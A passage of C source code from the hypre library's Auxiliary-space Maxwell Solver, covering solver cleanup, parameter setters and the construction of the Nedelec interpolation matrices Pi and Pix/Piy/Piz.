HYPRE_BoomerAMGDestroy(ams_data -> B_G);
if (ams_data -> owns_Pi && ams_data -> Pi)
hypre_ParCSRMatrixDestroy(ams_data -> Pi);
if (ams_data -> owns_A_Pi)
if (ams_data -> A_Pi)
hypre_ParCSRMatrixDestroy(ams_data -> A_Pi);
if (ams_data -> B_Pi)
HYPRE_BoomerAMGDestroy(ams_data -> B_Pi);
if (ams_data -> owns_Pi && ams_data -> Pix)
hypre_ParCSRMatrixDestroy(ams_data -> Pix);
if (ams_data -> A_Pix)
hypre_ParCSRMatrixDestroy(ams_data -> A_Pix);
if (ams_data -> B_Pix)
HYPRE_BoomerAMGDestroy(ams_data -> B_Pix);
if (ams_data -> owns_Pi && ams_data -> Piy)
hypre_ParCSRMatrixDestroy(ams_data -> Piy);
if (ams_data -> A_Piy)
hypre_ParCSRMatrixDestroy(ams_data -> A_Piy);
if (ams_data -> B_Piy)
HYPRE_BoomerAMGDestroy(ams_data -> B_Piy);
if (ams_data -> owns_Pi && ams_data -> Piz)
hypre_ParCSRMatrixDestroy(ams_data -> Piz);
if (ams_data -> A_Piz)
hypre_ParCSRMatrixDestroy(ams_data -> A_Piz);
if (ams_data -> B_Piz)
HYPRE_BoomerAMGDestroy(ams_data -> B_Piz);
if (ams_data -> r0)
hypre_ParVectorDestroy(ams_data -> r0);
if (ams_data -> g0)
hypre_ParVectorDestroy(ams_data -> g0);
if (ams_data -> r1)
hypre_ParVectorDestroy(ams_data -> r1);
if (ams_data -> g1)
hypre_ParVectorDestroy(ams_data -> g1);
if (ams_data -> r2)
hypre_ParVectorDestroy(ams_data -> r2);
if (ams_data -> g2)
hypre_ParVectorDestroy(ams_data -> g2);
if (ams_data -> G0)
hypre_ParCSRMatrixDestroy(ams_data -> A);
if (ams_data -> G0)
hypre_ParCSRMatrixDestroy(ams_data -> G0);
if (ams_data -> A_G0)
hypre_ParCSRMatrixDestroy(ams_data -> A_G0);
if (ams_data -> B_G0)
HYPRE_BoomerAMGDestroy(ams_data -> B_G0);
hypre_SeqVectorDestroy(ams_data -> A_l1_norms);
/* G, x, y ,z, Gx, Gy and Gz are not destroyed */
if (ams_data)
{
hypre_TFree(ams_data, HYPRE_MEMORY_HOST);
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetDimension
*
* Set problem dimension (2 or 3). By default we assume dim = 3.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetDimension(void *solver,
HYPRE_Int dim)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
if (dim != 2 && dim != 3)
hypre_error_in_arg(2);
ams_data -> dim = dim;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetDiscreteGradient
*
* Set the discrete gradient matrix G.
* This function should be called before hypre_AMSSetup()!
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetDiscreteGradient(void *solver,
hypre_ParCSRMatrix *G)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> G = G;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetCoordinateVectors
*
* Set the x, y and z coordinates of the vertices in the mesh.
*
* Either SetCoordinateVectors or SetEdgeConstantVectors should be
* called before hypre_AMSSetup()!
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetCoordinateVectors(void *solver,
hypre_ParVector *x,
hypre_ParVector *y,
hypre_ParVector *z)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> x = x;
ams_data -> y = y;
ams_data -> z = z;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetEdgeConstantVectors
*
* Set the vectors Gx, Gy and Gz which give the representations of
* the constant vector fields (1,0,0), (0,1,0) and (0,0,1) in the
* edge element basis.
*
* Either SetCoordinateVectors or SetEdgeConstantVectors should be
* called before hypre_AMSSetup()!
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetEdgeConstantVectors(void *solver,
hypre_ParVector *Gx,
hypre_ParVector *Gy,
hypre_ParVector *Gz)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> Gx = Gx;
ams_data -> Gy = Gy;
ams_data -> Gz = Gz;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetInterpolations
*
* Set the (components of) the Nedelec interpolation matrix Pi=[Pix,Piy,Piz].
*
* This function is generally intended to be used only for high-order Nedelec
* discretizations (in the lowest order case, Pi is constructed internally in
* AMS from the discreet gradient matrix and the coordinates of the vertices),
* though it can also be used in the lowest-order case or for other types of
* discretizations (e.g. ones based on the second family of Nedelec elements).
*
* By definition, Pi is the matrix representation of the linear operator that
* interpolates (high-order) vector nodal finite elements into the (high-order)
* Nedelec space. The component matrices are defined as Pix phi = Pi (phi,0,0)
* and similarly for Piy and Piz. Note that all these operators depend on the
* choice of the basis and degrees of freedom in the high-order spaces.
*
* The column numbering of Pi should be node-based, i.e. the x/y/z components of
* the first node (vertex or high-order dof) should be listed first, followed by
* the x/y/z components of the second node and so on (see the documentation of
* HYPRE_BoomerAMGSetDofFunc).
*
* If used, this function should be called before hypre_AMSSetup() and there is
* no need to provide the vertex coordinates. Furthermore, only one of the sets
* {Pi} and {Pix,Piy,Piz} needs to be specified (though it is OK to provide
* both). If Pix is NULL, then scalar Pi-based AMS cycles, i.e. those with
* cycle_type > 10, will be unavailable. Similarly, AMS cycles based on
* monolithic Pi (cycle_type < 10) require that Pi is not NULL.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetInterpolations(void *solver,
hypre_ParCSRMatrix *Pi,
hypre_ParCSRMatrix *Pix,
hypre_ParCSRMatrix *Piy,
hypre_ParCSRMatrix *Piz)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> Pi = Pi;
ams_data -> Pix = Pix;
ams_data -> Piy = Piy;
ams_data -> Piz = Piz;
ams_data -> owns_Pi = 0;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetAlphaPoissonMatrix
*
* Set the matrix corresponding to the Poisson problem with coefficient
* alpha (the curl-curl term coefficient in the Maxwell problem).
*
* If this function is called, the coarse space solver on the range
* of Pi^T is a block-diagonal version of A_Pi. If this function is not
* called, the coarse space solver on the range of Pi^T is constructed
* as Pi^T A Pi in hypre_AMSSetup().
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetAlphaPoissonMatrix(void *solver,
hypre_ParCSRMatrix *A_Pi)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> A_Pi = A_Pi;
/* Penalize the eliminated degrees of freedom */
hypre_ParCSRMatrixSetDiagRows(A_Pi, HYPRE_REAL_MAX);
/* Make sure that the first entry in each row is the diagonal one. */
/* hypre_CSRMatrixReorder(hypre_ParCSRMatrixDiag(A_Pi)); */
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetBetaPoissonMatrix
*
* Set the matrix corresponding to the Poisson problem with coefficient
* beta (the mass term coefficient in the Maxwell problem).
*
* This function call is optional - if not given, the Poisson matrix will
* be computed in hypre_AMSSetup(). If the given matrix is NULL, we assume
* that beta is 0 and use two-level (instead of three-level) methods.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetBetaPoissonMatrix(void *solver,
hypre_ParCSRMatrix *A_G)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> A_G = A_G;
if (!A_G)
ams_data -> beta_is_zero = 1;
else
{
/* Penalize the eliminated degrees of freedom */
hypre_ParCSRMatrixSetDiagRows(A_G, HYPRE_REAL_MAX);
/* Make sure that the first entry in each row is the diagonal one. */
/* hypre_CSRMatrixReorder(hypre_ParCSRMatrixDiag(A_G)); */
}
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetInteriorNodes
*
* Set the list of nodes which are interior to the zero-conductivity region.
* A node is interior if interior_nodes[i] == 1.0.
*
* Should be called before hypre_AMSSetup()!
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetInteriorNodes(void *solver,
hypre_ParVector *interior_nodes)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> interior_nodes = interior_nodes;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetProjectionFrequency
*
* How often to project the r.h.s. onto the compatible sub-space Ker(G0^T),
* when iterating with the solver.
*
* The default value is every 5th iteration.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetProjectionFrequency(void *solver,
HYPRE_Int projection_frequency)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> projection_frequency = projection_frequency;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetMaxIter
*
* Set the maximum number of iterations in the three-level method.
* The default value is 20. To use the AMS solver as a preconditioner,
* set maxit to 1, tol to 0.0 and print_level to 0.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetMaxIter(void *solver,
HYPRE_Int maxit)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> maxit = maxit;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetTol
*
* Set the convergence tolerance (if the method is used as a solver).
* The default value is 1e-6.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetTol(void *solver,
HYPRE_Real tol)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> tol = tol;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetCycleType
*
* Choose which three-level solver to use. Possible values are:
*
* 1 = 3-level multipl. solver (01210) <-- small solution time
* 2 = 3-level additive solver (0+1+2)
* 3 = 3-level multipl. solver (02120)
* 4 = 3-level additive solver (010+2)
* 5 = 3-level multipl. solver (0102010) <-- small solution time
* 6 = 3-level additive solver (1+020)
* 7 = 3-level multipl. solver (0201020) <-- small number of iterations
* 8 = 3-level additive solver (0(1+2)0) <-- small solution time
* 9 = 3-level multipl. solver (01210) with discrete divergence
* 11 = 5-level multipl. solver (013454310) <-- small solution time, memory
* 12 = 5-level additive solver (0+1+3+4+5)
* 13 = 5-level multipl. solver (034515430) <-- small solution time, memory
* 14 = 5-level additive solver (01(3+4+5)10)
* 20 = 2-level multipl. solver (0[12]0)
*
* 0 = a Hiptmair-like smoother (010)
*
* The default value is 1.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetCycleType(void *solver,
HYPRE_Int cycle_type)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> cycle_type = cycle_type;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetPrintLevel
*
* Control how much information is printed during the solution iterations.
* The defaut values is 1 (print residual norm at each step).
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetPrintLevel(void *solver,
HYPRE_Int print_level)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> print_level = print_level;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetSmoothingOptions
*
* Set relaxation parameters for A. Default values: 2, 1, 1.0, 1.0.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetSmoothingOptions(void *solver,
HYPRE_Int A_relax_type,
HYPRE_Int A_relax_times,
HYPRE_Real A_relax_weight,
HYPRE_Real A_omega)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> A_relax_type = A_relax_type;
ams_data -> A_relax_times = A_relax_times;
ams_data -> A_relax_weight = A_relax_weight;
ams_data -> A_omega = A_omega;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetChebySmoothingOptions
* AB: note: this could be added to the above,
* but I didn't want to change parameter list)
* Set parameters for chebyshev smoother for A. Default values: 2,.3.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetChebySmoothingOptions(void *solver,
HYPRE_Int A_cheby_order,
HYPRE_Int A_cheby_fraction)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> A_cheby_order = A_cheby_order;
ams_data -> A_cheby_fraction = A_cheby_fraction;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetAlphaAMGOptions
*
* Set AMG parameters for B_Pi. Default values: 10, 1, 3, 0.25, 0, 0.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetAlphaAMGOptions(void *solver,
HYPRE_Int B_Pi_coarsen_type,
HYPRE_Int B_Pi_agg_levels,
HYPRE_Int B_Pi_relax_type,
HYPRE_Real B_Pi_theta,
HYPRE_Int B_Pi_interp_type,
HYPRE_Int B_Pi_Pmax)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> B_Pi_coarsen_type = B_Pi_coarsen_type;
ams_data -> B_Pi_agg_levels = B_Pi_agg_levels;
ams_data -> B_Pi_relax_type = B_Pi_relax_type;
ams_data -> B_Pi_theta = B_Pi_theta;
ams_data -> B_Pi_interp_type = B_Pi_interp_type;
ams_data -> B_Pi_Pmax = B_Pi_Pmax;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetAlphaAMGCoarseRelaxType
*
* Set the AMG coarsest level relaxation for B_Pi. Default value: 8.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetAlphaAMGCoarseRelaxType(void *solver,
HYPRE_Int B_Pi_coarse_relax_type)
{
hypre_AMSData *ams_data = (hypre_AMSData *)solver;
ams_data -> B_Pi_coarse_relax_type = B_Pi_coarse_relax_type;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetBetaAMGOptions
*
* Set AMG parameters for B_G. Default values: 10, 1, 3, 0.25, 0, 0.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetBetaAMGOptions(void *solver,
HYPRE_Int B_G_coarsen_type,
HYPRE_Int B_G_agg_levels,
HYPRE_Int B_G_relax_type,
HYPRE_Real B_G_theta,
HYPRE_Int B_G_interp_type,
HYPRE_Int B_G_Pmax)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> B_G_coarsen_type = B_G_coarsen_type;
ams_data -> B_G_agg_levels = B_G_agg_levels;
ams_data -> B_G_relax_type = B_G_relax_type;
ams_data -> B_G_theta = B_G_theta;
ams_data -> B_G_interp_type = B_G_interp_type;
ams_data -> B_G_Pmax = B_G_Pmax;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetBetaAMGCoarseRelaxType
*
* Set the AMG coarsest level relaxation for B_G. Default value: 8.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetBetaAMGCoarseRelaxType(void *solver,
HYPRE_Int B_G_coarse_relax_type)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
ams_data -> B_G_coarse_relax_type = B_G_coarse_relax_type;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSComputePi
*
* Construct the Pi interpolation matrix, which maps the space of vector
* linear finite elements to the space of edge finite elements.
*
* The construction is based on the fact that Pi = [Pi_x, Pi_y, Pi_z],
* where each block has the same sparsity structure as G, and the entries
* can be computed from the vectors Gx, Gy, Gz.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSComputePi(hypre_ParCSRMatrix *A,
hypre_ParCSRMatrix *G,
hypre_ParVector *Gx,
hypre_ParVector *Gy,
hypre_ParVector *Gz,
HYPRE_Int dim,
hypre_ParCSRMatrix **Pi_ptr)
{
hypre_ParCSRMatrix *Pi;
/* Compute Pi = [Pi_x, Pi_y, Pi_z] */
{
HYPRE_Int i, j, d;
HYPRE_Real *Gx_data, *Gy_data, *Gz_data;
MPI_Comm comm = hypre_ParCSRMatrixComm(G);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(G);
HYPRE_BigInt global_num_cols = dim*hypre_ParCSRMatrixGlobalNumCols(G);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(G);
HYPRE_BigInt *col_starts;
HYPRE_Int col_starts_size;
HYPRE_Int num_cols_offd = dim*hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(G));
HYPRE_Int num_nonzeros_diag = dim*hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(G));
HYPRE_Int num_nonzeros_offd = dim*hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(G));
HYPRE_BigInt *col_starts_G = hypre_ParCSRMatrixColStarts(G);
col_starts_size = 2;
col_starts = hypre_TAlloc(HYPRE_BigInt, col_starts_size, HYPRE_MEMORY_HOST);
for (i = 0; i < col_starts_size; i++)
col_starts[i] = (HYPRE_BigInt)dim * col_starts_G[i];
Pi = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(Pi) = 1;
hypre_ParCSRMatrixOwnsRowStarts(Pi) = 0;
hypre_ParCSRMatrixOwnsColStarts(Pi) = 1;
hypre_ParCSRMatrixInitialize(Pi);
Gx_data = hypre_VectorData(hypre_ParVectorLocalVector(Gx));
Gy_data = hypre_VectorData(hypre_ParVectorLocalVector(Gy));
if (dim == 3)
Gz_data = hypre_VectorData(hypre_ParVectorLocalVector(Gz));
/* Fill-in the diagonal part */
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
HYPRE_Int *G_diag_I = hypre_CSRMatrixI(G_diag);
HYPRE_Int *G_diag_J = hypre_CSRMatrixJ(G_diag);
HYPRE_Real *G_diag_data = hypre_CSRMatrixData(G_diag);
HYPRE_Int G_diag_nrows = hypre_CSRMatrixNumRows(G_diag);
HYPRE_Int G_diag_nnz = hypre_CSRMatrixNumNonzeros(G_diag);
hypre_CSRMatrix *Pi_diag = hypre_ParCSRMatrixDiag(Pi);
HYPRE_Int *Pi_diag_I = hypre_CSRMatrixI(Pi_diag);
HYPRE_Int *Pi_diag_J = hypre_CSRMatrixJ(Pi_diag);
HYPRE_Real *Pi_diag_data = hypre_CSRMatrixData(Pi_diag);
for (i = 0; i < G_diag_nrows+1; i++)
Pi_diag_I[i] = dim * G_diag_I[i];
for (i = 0; i < G_diag_nnz; i++)
for (d = 0; d < dim; d++)
Pi_diag_J[dim*i+d] = dim*G_diag_J[i]+d;
for (i = 0; i < G_diag_nrows; i++)
for (j = G_diag_I[i]; j < G_diag_I[i+1]; j++)
{
*Pi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gx_data[i];
*Pi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gy_data[i];
if (dim == 3)
*Pi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gz_data[i];
}
}
/* Fill-in the off-diagonal part */
{
hypre_CSRMatrix *G_offd = hypre_ParCSRMatrixOffd(G);
HYPRE_Int *G_offd_I = hypre_CSRMatrixI(G_offd);
HYPRE_Int *G_offd_J = hypre_CSRMatrixJ(G_offd);
HYPRE_Real *G_offd_data = hypre_CSRMatrixData(G_offd);
HYPRE_Int G_offd_nrows = hypre_CSRMatrixNumRows(G_offd);
HYPRE_Int G_offd_ncols = hypre_CSRMatrixNumCols(G_offd);
HYPRE_Int G_offd_nnz = hypre_CSRMatrixNumNonzeros(G_offd);
hypre_CSRMatrix *Pi_offd = hypre_ParCSRMatrixOffd(Pi);
HYPRE_Int *Pi_offd_I = hypre_CSRMatrixI(Pi_offd);
HYPRE_Int *Pi_offd_J = hypre_CSRMatrixJ(Pi_offd);
HYPRE_Real *Pi_offd_data = hypre_CSRMatrixData(Pi_offd);
HYPRE_BigInt *G_cmap = hypre_ParCSRMatrixColMapOffd(G);
HYPRE_BigInt *Pi_cmap = hypre_ParCSRMatrixColMapOffd(Pi);
if (G_offd_ncols)
for (i = 0; i < G_offd_nrows+1; i++)
Pi_offd_I[i] = dim * G_offd_I[i];
for (i = 0; i < G_offd_nnz; i++)
for (d = 0; d < dim; d++)
Pi_offd_J[dim*i+d] = dim*G_offd_J[i]+d;
for (i = 0; i < G_offd_nrows; i++)
for (j = G_offd_I[i]; j < G_offd_I[i+1]; j++)
{
*Pi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gx_data[i];
*Pi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gy_data[i];
if (dim == 3)
*Pi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gz_data[i];
}
for (i = 0; i < G_offd_ncols; i++)
for (d = 0; d < dim; d++)
Pi_cmap[dim*i+d] = (HYPRE_BigInt)dim*G_cmap[i]+(HYPRE_BigInt)d;
}
}
*Pi_ptr = Pi;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSComputePixyz
*
* Construct the components Pix, Piy, Piz of the interpolation matrix Pi,
* which maps the space of vector linear finite elements to the space of
* edge finite elements.
*
* The construction is based on the fact that each component has the same
* sparsity structure as G, and the entries can be computed from the vectors
* Gx, Gy, Gz.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSComputePixyz(hypre_ParCSRMatrix *A,
hypre_ParCSRMatrix *G,
hypre_ParVector *Gx,
hypre_ParVector *Gy,
hypre_ParVector *Gz,
HYPRE_Int dim,
hypre_ParCSRMatrix **Pix_ptr,
hypre_ParCSRMatrix **Piy_ptr,
hypre_ParCSRMatrix **Piz_ptr)
{
hypre_ParCSRMatrix *Pix, *Piy, *Piz;
/* Compute Pix, Piy, Piz */
{
HYPRE_Int i, j;
HYPRE_Real *Gx_data, *Gy_data, *Gz_data;
MPI_Comm comm = hypre_ParCSRMatrixComm(G);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(G);
HYPRE_BigInt global_num_cols = hypre_ParCSRMatrixGlobalNumCols(G);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(G);
HYPRE_BigInt *col_starts = hypre_ParCSRMatrixColStarts(G);
HYPRE_Int num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(G));
HYPRE_Int num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(G));
HYPRE_Int num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(G));
Pix = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(Pix) = 1;
hypre_ParCSRMatrixOwnsRowStarts(Pix) = 0;
hypre_ParCSRMatrixOwnsColStarts(Pix) = 0;
hypre_ParCSRMatrixInitialize(Pix);
Piy = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(Piy) = 1;
hypre_ParCSRMatrixOwnsRowStarts(Piy) = 0;
hypre_ParCSRMatrixOwnsColStarts(Piy) = 0;
hypre_ParCSRMatrixInitialize(Piy);
if (dim == 3)
{
Piz = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(Piz) = 1;
hypre_ParCSRMatrixOwnsRowStarts(Piz) = 0;
hypre_ParCSRMatrixOwnsColStarts(Piz) = 0;
hypre_ParCSRMatrixInitialize(Piz);
}
Gx_data = hypre_VectorData(hypre_ParVectorLocalVector(Gx));
Gy_data = hypre_VectorData(hypre_ParVectorLocalVector(Gy));
if (dim == 3)
Gz_data = hypre_VectorData(hypre_ParVectorLocalVector(Gz));
/* Fill-in the diagonal part */
if (dim == 3)
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
HYPRE_Int *G_diag_I = hypre_CSRMatrixI(G_diag);
HYPRE_Int *G_diag_J = hypre_CSRMatrixJ(G_diag);
HYPRE_Real *G_diag_data = hypre_CSRMatrixData(G_diag);
HYPRE_Int G_diag_nrows = hypre_CSRMatrixNumRows(G_diag);
HYPRE_Int G_diag_nnz = hypre_CSRMatrixNumNonzeros(G_diag);
hypre_CSRMatrix *Pix_diag = hypre_ParCSRMatrixDiag(Pix);
HYPRE_Int *Pix_diag_I = hypre_CSRMatrixI(Pix_diag);
HYPRE_Int *Pix_diag_J = hypre_CSRMatrixJ(Pix_diag);
HYPRE_Real *Pix_diag_data = hypre_CSRMatrixData(Pix_diag);
hypre_CSRMatrix *Piy_diag = hypre_ParCSRMatrixDiag(Piy);
HYPRE_Int *Piy_diag_I = hypre_CSRMatrixI(Piy_diag);
HYPRE_Int *Piy_diag_J = hypre_CSRMatrixJ(Piy_diag);
HYPRE_Real *Piy_diag_data = hypre_CSRMatrixData(Piy_diag);
hypre_CSRMatrix *Piz_diag = hypre_ParCSRMatrixDiag(Piz);
HYPRE_Int *Piz_diag_I = hypre_CSRMatrixI(Piz_diag);
HYPRE_Int *Piz_diag_J = hypre_CSRMatrixJ(Piz_diag);
HYPRE_Real *Piz_diag_data = hypre_CSRMatrixData(Piz_diag);
for (i = 0; i < G_diag_nrows+1; i++)
{
Pix_diag_I[i] = G_diag_I[i];
Piy_diag_I[i] = G_diag_I[i];
Piz_diag_I[i] = G_diag_I[i];
}
for (i = 0; i < G_diag_nnz; i++)
{
Pix_diag_J[i] = G_diag_J[i];
Piy_diag_J[i] = G_diag_J[i];
Piz_diag_J[i] = G_diag_J[i];
}
for (i = 0; i < G_diag_nrows; i++)
for (j = G_diag_I[i]; j < G_diag_I[i+1]; j++)
{
*Pix_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gx_data[i];
*Piy_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gy_data[i];
*Piz_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gz_data[i];
}
}
else
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
HYPRE_Int *G_diag_I = hypre_CSRMatrixI(G_diag);
HYPRE_Int *G_diag_J = hypre_CSRMatrixJ(G_diag);
HYPRE_Real *G_diag_data = hypre_CSRMatrixData(G_diag);
HYPRE_Int G_diag_nrows = hypre_CSRMatrixNumRows(G_diag);
HYPRE_Int G_diag_nnz = hypre_CSRMatrixNumNonzeros(G_diag);
hypre_CSRMatrix *Pix_diag = hypre_ParCSRMatrixDiag(Pix);
HYPRE_Int *Pix_diag_I = hypre_CSRMatrixI(Pix_diag);
HYPRE_Int *Pix_diag_J = hypre_CSRMatrixJ(Pix_diag);
HYPRE_Real *Pix_diag_data = hypre_CSRMatrixData(Pix_diag);
hypre_CSRMatrix *Piy_diag = hypre_ParCSRMatrixDiag(Piy);
HYPRE_Int *Piy_diag_I = hypre_CSRMatrixI(Piy_diag);
HYPRE_Int *Piy_diag_J = hypre_CSRMatrixJ(Piy_diag);
HYPRE_Real *Piy_diag_data = hypre_CSRMatrixData(Piy_diag);
for (i = 0; i < G_diag_nrows+1; i++)
{
Pix_diag_I[i] = G_diag_I[i];
Piy_diag_I[i] = G_diag_I[i];
}
for (i = 0; i < G_diag_nnz; i++)
{
Pix_diag_J[i] = G_diag_J[i];
Piy_diag_J[i] = G_diag_J[i];
}
for (i = 0; i < G_diag_nrows; i++)
for (j = G_diag_I[i]; j < G_diag_I[i+1]; j++)
{
*Pix_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gx_data[i];
*Piy_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gy_data[i];
}
}
/* Fill-in the off-diagonal part */
if (dim == 3)
{
hypre_CSRMatrix *G_offd = hypre_ParCSRMatrixOffd(G);
HYPRE_Int *G_offd_I = hypre_CSRMatrixI(G_offd);
HYPRE_Int *G_offd_J = hypre_CSRMatrixJ(G_offd);
HYPRE_Real *G_offd_data = hypre_CSRMatrixData(G_offd);
HYPRE_Int G_offd_nrows = hypre_CSRMatrixNumRows(G_offd);
HYPRE_Int G_offd_ncols = hypre_CSRMatrixNumCols(G_offd);
HYPRE_Int G_offd_nnz = hypre_CSRMatrixNumNonzeros(G_offd);
hypre_CSRMatrix *Pix_offd = hypre_ParCSRMatrixOffd(Pix);
HYPRE_Int *Pix_offd_I = hypre_CSRMatrixI(Pix_offd);
HYPRE_Int *Pix_offd_J = hypre_CSRMatrixJ(Pix_offd);
HYPRE_Real *Pix_offd_data = hypre_CSRMatrixData(Pix_offd);
hypre_CSRMatrix *Piy_offd = hypre_ParCSRMatrixOffd(Piy);
HYPRE_Int *Piy_offd_I = hypre_CSRMatrixI(Piy_offd);
HYPRE_Int *Piy_offd_J = hypre_CSRMatrixJ(Piy_offd);
HYPRE_Real *Piy_offd_data = hypre_CSRMatrixData(Piy_offd);
hypre_CSRMatrix *Piz_offd = hypre_ParCSRMatrixOffd(Piz);
HYPRE_Int *Piz_offd_I = hypre_CSRMatrixI(Piz_offd);
HYPRE_Int *Piz_offd_J = hypre_CSRMatrixJ(Piz_offd);
HYPRE_Real *Piz_offd_data = hypre_CSRMatrixData(Piz_offd);
HYPRE_BigInt *G_cmap = hypre_ParCSRMatrixColMapOffd(G);
HYPRE_BigInt *Pix_cmap = hypre_ParCSRMatrixColMapOffd(Pix);
HYPRE_BigInt *Piy_cmap = hypre_ParCSRMatrixColMapOffd(Piy);
HYPRE_BigInt *Piz_cmap = hypre_ParCSRMatrixColMapOffd(Piz);
if (G_offd_ncols)
for (i = 0; i < G_offd_nrows+1; i++)
{
Pix_offd_I[i] = G_offd_I[i];
Piy_offd_I[i] = G_offd_I[i];
Piz_offd_I[i] = G_offd_I[i];
}
for (i = 0; i < G_offd_nnz; i++)
{
Pix_offd_J[i] = G_offd_J[i];
Piy_offd_J[i] = G_offd_J[i];
